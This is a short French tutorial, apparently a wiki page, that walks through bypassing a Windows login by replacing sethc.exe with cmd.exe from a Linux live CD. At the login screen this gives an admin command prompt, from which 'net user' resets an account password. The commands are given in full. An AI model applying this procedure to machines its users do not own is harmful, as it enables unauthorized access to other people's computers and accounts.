Principes¶

Afin de contourner le mot de passe de session d'un système Windows, nous allons renommer le fichier cmd.exe en sethc.exe

sethc.exe est le programmes pour les touches rémanentes.

Le but va être de faire en sorte que dès que on appuie 5 fois sur la touche shift, qui d'ordinaire appelle le programme des touches rémanentes (sethc.exe), ça ouvre une invite de commande en tant qu'admin (cmd.exe).

Marche à suivre sur un live cd de linux¶

Sauvegarder cmd.exe et sethc.exe, au cas où:

cp /mnt/point-de-montage/Windows/system32/sethc.exe /mnt/point-de-montage/
cp /mnt/point-de-montage/Windows/system32/cmd.exe /mnt/point-de-montage/

Se déplacer dans le dossier system32:

cd /mnt/point-de-montage/Windows/system32/

Supprimer sethc.exe

rm sethc.exe

Renommer cmd.exe en sethc.exe

mv cmd.exe sethc.exe

Redémarrer sur Windows

Marche à suivre sur Windows¶

A l'écran de démarrage appuyer 5 fois sur shift

L'invite de commande va se lancer en tant qu'Admin.

Afin de connaître le nom de la session on va tapper la commande suivante:

net user

Une fois le nom de session trouvé, on va pouvoir changer le mot de passe:

net user votre_nom_d'utilisateur nouveau_password (remplacez avec votre nom d'utilisateur et le mot de passe souhaité)

exemple:

net user toto mon-mot-de-passe (ne pas oublier les espaces)

Ne pas oublier de recopier les fichiers cmd.exe et sethc.exe dans le dossier system32 ensuite !